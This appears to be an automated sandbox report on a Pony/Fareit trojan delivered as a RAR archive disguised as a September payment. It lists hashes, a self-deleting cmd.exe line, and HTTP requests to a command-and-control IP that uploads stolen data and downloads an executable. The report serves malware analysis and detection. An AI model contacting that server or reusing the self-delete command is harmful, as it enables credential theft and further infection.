File name: Оплата за сентябрь.001

Full analysis: https://app.any.run/tasks/e8e64bc0-60db-419e-afc3-c08e403eb670
Verdict: Malicious activity
Threats:
Pony is malware with two main functions: stealing information and dropping other malware with different tasks on infected machines. It has been around since 2011 and still actively attacks users in Europe and America.

Analysis date: September 19, 2019, 06:26:12
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags: trojan, pony, fareit
Indicators:
MIME: application/x-rar
File info: RAR archive data, v5
MD5: CB2834BE49E807798BB576D2BC772456
SHA1: 928B035E07B0B25BD8246A1DED6415479E0D6206
SHA256: F9D4E81152DA11CBA77D38B594B4F930B88FECF7FDA71D8DA94E3662FA7638F0
SSDEEP: 1536:lLDR8fRZcEKeXabr2K0RiUWZeEISRU1ka1XA0mGAfZ:ZR8fncEEbJrnZeEISRU1vrTAR

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS
    • Application was dropped or rewritten from another process
      • Оплата за сентябрь.exe (PID: 2684)
      • Оплата за сентябрь.exe (PID: 3276)
    • Downloads executable files from IP
      • Оплата за сентябрь.exe (PID: 3276)
    • Connects to CnC server
      • Оплата за сентябрь.exe (PID: 3276)
    • Detected Pony/Fareit Trojan
      • Оплата за сентябрь.exe (PID: 3276)
    • Downloads executable files from the Internet
      • Оплата за сентябрь.exe (PID: 3276)
    • Actions looks like stealing of personal data
      • Оплата за сентябрь.exe (PID: 3276)
  • SUSPICIOUS
    • Starts CMD.EXE for self-deleting
      • Оплата за сентябрь.exe (PID: 3276)
    • Application launched itself
      • Оплата за сентябрь.exe (PID: 2684)
    • Executable content was dropped or overwritten
      • WinRAR.exe (PID: 2724)
    • Connects to server without host name
      • Оплата за сентябрь.exe (PID: 3276)
    • Searches for installed software
      • Оплата за сентябрь.exe (PID: 3276)
    • Starts CMD.EXE for commands execution
      • Оплата за сентябрь.exe (PID: 3276)
  • INFO
    • Application was crashed
      • Оплата за сентябрь.exe (PID: 3276)
      • Оплата за сентябрь.exe (PID: 2684)
No Malware configuration.

TRiD

.rar | RAR compressed archive (v5.0) (61.5)
.rar | RAR compressed archive (gen) (38.4)
No data.
All screenshots are available in the full report
Total processes: 39
Monitored processes: 5
Malicious processes: 3
Suspicious processes: 0

Behavior graph (process tree recovered from the graph labels):
winrar.exe -> (drop and start) оплата за сентябрь.exe -> (start) оплата за сентябрь.exe #PONY -> cmd.exe (no specs) -> ping.exe (no specs)

Process information

PID: 2724
CMD: "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\Оплата за сентябрь.001.rar"
Path: C:\Program Files\WinRAR\WinRAR.exe
Parent process: explorer.exe
User: admin
Company: Alexander Roshal
Integrity Level: MEDIUM
Description: WinRAR archiver
Version: 5.60.0

PID: 2684
CMD: "C:\Users\admin\AppData\Local\Temp\Rar$EXa2724.40007\Оплата за сентябрь.exe"
Path: C:\Users\admin\AppData\Local\Temp\Rar$EXa2724.40007\Оплата за сентябрь.exe
Parent process: WinRAR.exe
User: admin
Integrity Level: MEDIUM
Exit code: 3221225477

PID: 3276
CMD: "C:\Users\admin\AppData\Local\Temp\Rar$EXa2724.40007\Оплата за сентябрь.exe" dfsr
Path: C:\Users\admin\AppData\Local\Temp\Rar$EXa2724.40007\Оплата за сентябрь.exe
Parent process: Оплата за сентябрь.exe
User: admin
Integrity Level: MEDIUM
Exit code: 3221225477

PID: 3868
CMD: cmd.exe /c ping 127.0.0.1 & del /F /Q "C:\Users\admin\AppData\Local\Temp\Rar$EXa2724.40007\Оплата за сентябрь.exe"
Path: C:\Windows\system32\cmd.exe
Parent process: Оплата за сентябрь.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Exit code: 0
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID: 2772
CMD: ping 127.0.0.1
Path: C:\Windows\system32\PING.EXE
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: TCP/IP Ping Command
Exit code: 0
Version: 6.1.7600.16385 (win7_rtm.090713-1255)
Total events: 533
Read events: 490
Write events: 0
Delete events: 0

Modification events

No data
Executable files: 1
Suspicious files: 0
Text files: 0
Unknown types: 0

Dropped files

PID | Process | Filename | Type
2724 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$EXa2724.40007\Оплата за сентябрь.exe | executable
MD5: 97092BEC12FB5938C70229BA2708E3E4
SHA256: 42B937924371D2FFB1168F5A739A86BF1A4820BD24DA79B0B8B34D133B88CA74
HTTP(S) requests: 5
TCP/UDP connections: 9
DNS requests: 2
Threats: 0

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
3276 | Оплата за сентябрь.exe | POST | - | 172.105.69.5:80 | http://172.105.69.5/g_38472341.php | US | - | - | malicious
3276 | Оплата за сентябрь.exe | GET | 200 | 172.105.69.5:80 | http://172.105.69.5/index.php?id=0&un=61646d696e&cn=555345522d5043 | US | executable | 97.0 Kb | malicious
3276 | Оплата за сентябрь.exe | POST | - | 172.105.69.5:80 | http://172.105.69.5/g_38472341.php | US | - | - | malicious
3276 | Оплата за сентябрь.exe | POST | - | 172.105.69.5:80 | http://172.105.69.5/g_38472341.php | US | - | - | malicious
3276 | Оплата за сентябрь.exe | GET | 200 | 172.105.69.5:80 | http://172.105.69.5/index.php?id=0&un=61646d696e&cn=555345522d5043 | US | executable | 97.0 Kb | malicious

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
3276 | Оплата за сентябрь.exe | 104.16.54.3:443 | blockchain.info | Cloudflare Inc | US | shared
3276 | Оплата за сентябрь.exe | 172.105.69.5:80 | - | - | US | malicious
3276 | Оплата за сентябрь.exe | 52.86.198.63:443 | api.blockcypher.com | Amazon.com, Inc. | US | malicious

DNS requests

Domain | IP | Reputation
blockchain.info | 104.16.54.3, 104.16.55.3 | shared
api.blockcypher.com | 52.86.198.63, 3.225.205.112 | whitelisted

Threats

PID | Process | Class | Message
3276 | Оплата за сентябрь.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP
3276 | Оплата за сентябрь.exe | A Network Trojan was detected | ET CURRENT_EVENTS WinHttpRequest Downloading EXE
3276 | Оплата за сентябрь.exe | Potentially Bad Traffic | ET INFO SUSPICIOUS Dotted Quad Host MZ Response
3276 | Оплата за сентябрь.exe | A Network Trojan was detected | ET TROJAN Pony DLL Download M2
3276 | Оплата за сентябрь.exe | A Network Trojan was detected | ET TROJAN Fareit/Pony Downloader Checkin 2
3276 | Оплата за сентябрь.exe | A Network Trojan was detected | ET TROJAN Fareit/Pony Downloader Checkin 2
3276 | Оплата за сентябрь.exe | A Network Trojan was detected | ET CURRENT_EVENTS WinHttpRequest Downloading EXE
3276 | Оплата за сентябрь.exe | Potentially Bad Traffic | ET INFO SUSPICIOUS Dotted Quad Host MZ Response
3276 | Оплата за сентябрь.exe | A Network Trojan was detected | ET TROJAN Pony DLL Download M2
3276 | Оплата за сентябрь.exe | A Network Trojan was detected | ET TROJAN Fareit/Pony Downloader Checkin 2
No debug info